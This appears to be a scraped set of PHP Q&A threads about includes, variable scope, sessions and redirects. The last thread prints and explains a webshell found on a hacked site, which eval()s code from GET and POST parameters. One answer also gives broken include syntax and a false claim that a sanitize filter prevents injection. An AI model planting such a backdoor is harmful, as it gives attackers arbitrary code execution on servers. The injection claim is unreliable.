I am working on a page that demands that a certain php code is included at runtime - however, at some point in the code below, the variable in that included file is to be rewritten by a remote curl POST request, so I need to re-include the file to read the new value of the variable.
Can I "include" it again to reload the new value? Or is a double include of the same file within the same code not allowed?
EDIT:
Here's what I'm doing exactly:
include a file, that contains 1 variable
run a check in an online API to make sure the URL from the variable is not in the database
if it is, initiate a cURL POST request to a page on my second domain, that starts a chain of events there
after that chain is completed, the second page sends a cURL request to another page on my first domain - the request contains another URL which it passes to a page on my first domain, which in turns grabs that and overwrites the initially included file with the new value for the variable
back to my initial code - I now have a new value for that previously included variable, so I need to "reload" it somehow, because I will be using it a bit later in the code of the same page; won't re-including the file be best?
I think you should move the "later part" of the code in your first PHP file to the file that overwrites your initial variable in #4. Else, move that code to new php file altogether.
You can also implement a web-hook kind of system where you'd pass the "variable" to the first code as a GET/POST parameter. So, the first time that code gets called it will check for the variable. If empty, then it does what you mentioned in steps 1-4.
Then step #4 calls that PHP code again, but passing a variable value. Hence, instead of executing the first part of the code, the file executes the later part.
In any event, your code seems to be too convulated, and is best to split it into functions and classes or something.
I ended up using the following:
$newly_updated_file = "file_with_variable.php";
$lines = file($newly_updated_file);
$new_variable = $lines[15];
Ought to do fine.
Related
How does one access and receive back a variable from a PHP file with a HTTP Request?
I have gotten a HTTP Request to connect to my .PHP file. What I wanted to do next is for example reference that I want to receive $testvariable = 1; back but I have no idea where to begin. The HTTP parameters don't really let me reference this $testvariable directly.
What if the PHP file has simply one function and at the end of it it does a return $testvariable;? Would HTTP receive back this one variable? What if I need more than one. Maybe try and get the PHP to place parameters in the URL and the HTTP reads those parameters in the url? Maybe these "headers" are key to this...
I figured it out. HTTP Request gets back ALL that is on your HTML page. It seems like it ignores <html><body> tags but everything else in the body gets taken back at your response. Even if your answer is " 1 " but you have a single space around it your response is 1 including blank spaces. You need a clean "1".
Passing variables works by using the contents field. You place your values and assign them to a string like number= that then gets posted on the page. When a page is loaded, it can look for a variable under the same name like $test = $_POST['number']; and take the value within that variable and use it further where it needs to on your page.
I am working with three PHP files. Two serve as web pages and the other in an external server side script. The server side script is included in both web pages files and what I want to do is have some buttons on the first page and depending on which one is clicked, populate the second page with data and then redirect to it.
With the code below, the idea was to pick up the button click, figure out which button was clicked, and then call the function to run the proper query and set the needed variables. I don't understand why the variable is not getting set.
Thanks to anyone looking at this!
First page's button (index.php):
<input type="submit" id='details' name='details' value='Submit'/>
Second page where variable is undefined when page is loaded:
<h4><?php echo $selected_button; ?></h4>
External script:
function detailBuilder(){
$selected_button = "Option One";
//header('Location: details.php'); if this is here, the page still redirects but the variable doe not get set
//More will happen here once it works
}
if(isset($_POST['details'])){
detailBuilder();
header('Location: details.php');
}
As several people have pointed out previously, you redirect to another file. At that point, all locally defined variables are gone - you no longer have access to them.
Look into PHP sessions in PHP's documentation. Sessions will allow you to transfer these variables from request to request. However, sessions will only work if you are running some form of webserver.
UPDATE: Also to note, as other people (once again) have pointed out, $selected_button = "Option One" will ONLY apply inside the "scope" of the function detailBuilder. So calling detailBuilder() creates a variable called $selected_button inside the function, and then immediately discards it.
UPDATE 2.0: Sorry for so many updates. Here's an example of setting a session:
Update 3.0: updated code slightly
First things first. Make sure you start the session.
session_start();
You're going to have to call session_start() at the start of any php script! That means that the first file that executes every time should have session_start() at the top.
External Script:
$_SESSION["selected_option"] = "Option One";
Script where originally it was undefined:
$selected_details = $_SESSION["selected_option"];
?>
<h4><?=$selected_details?></h4>
usually when i want to redirect from one php page to another php page of same project i'm using
header("location:somepage.php");
This will cause more calls between client and server. What i want to do is instead of sending redirect header, i want to stop execution of requested page and pass request object or request information to the another page which i want to redirect. In this case single request will be enough. I guess this kind of functionality available in jsp. Is same thing available in php which i don't know?
As #DanSherwin commented, you probably want to use include. You might do something like this:
firstpage.php:
if(/* Some condition when you want to do a redirect */){
include 'somepage.php';
exit;
}
This runs the code from somepage.php immediately, as though it was cut and pasted into firstpage.php**, and then it exits right afterward as though you redirected away from firstpage.php.
** caveat: watch out for variable scope.
In my php code there is a section which needs to be retrieved from another php file.
I tried accomplishing this by:
include "teams.php?id=".$matchid;
and in the teams.php
$matchid = $_GET['id'];
echo "MATCH ID IS ".$matchid;
The problem is when i open teams.php?id=".$matchid directly it displays the match id fine
however the include doesn't work - i checked the source code of the original page - no code is being inserted. Is there a way to do what i want? I need to get php code from another file whilst passing 2 variables onto that file
Problem
The problem is related to what $_GET really contains:
An associative array of variables passed to the current script via the URL parameters. (...)
And you do not pass $matchid to the script through URL... And you should not in this case.
Solution
But there is a way. PHP does not separate global variables among files, so variables available in one file are available also in the one included:
in file no. 1:
// Assume $matchid is defined
include "teams.php";
in file no. 2 (the one included):
// No need to redefine $matchid - it was defined in the first file
echo "MATCH ID IS ".$matchid;
Also make sure you add <?php at the beginning of the file (the closing tag is not required). Otherwise it will be treated as text and not executed.
The problem is that you aren't loading that page in the browser when you call the include function, so the variable you are appending is not being processed as a URL query param. You are really just taking everything inside teams.php and dumping it into the other file (the one including teams.php) at that position.
If you want to effectively pass something into teams.php then just declare a variable before the include.
Check out http://php.net/manual/en/function.include.php and all will become clear.
That's not how include's work. When you include a file, it's code is executed as if it was written in the same file it's being included in. So teams.php will have the variable $matchid when the including file has that variable, no need to pass it in. Also the way you called the include was incorrect. Doing what you did causes php to look for a file in the current directory called 'teams.php?id=0' (replace 0 with the $matchid value). This file does not exist, 'teams.php' exists, not the URI. It is possible to specify a url by prefixing it with 'http://' however the result would work with the code in teams.php as it would expect to be able to read the php source.
You can do like this include "include "teams.php?id={$matchid}"; and
$matchid = filter_input(INPUT_GET, 'id', FILTER_SANITIZE_STRING);
echo "MATCH ID IS {$matchid}";
If You will use this code, you will be safe from Injects too!
I hope you will apreciate this.
I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.
It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval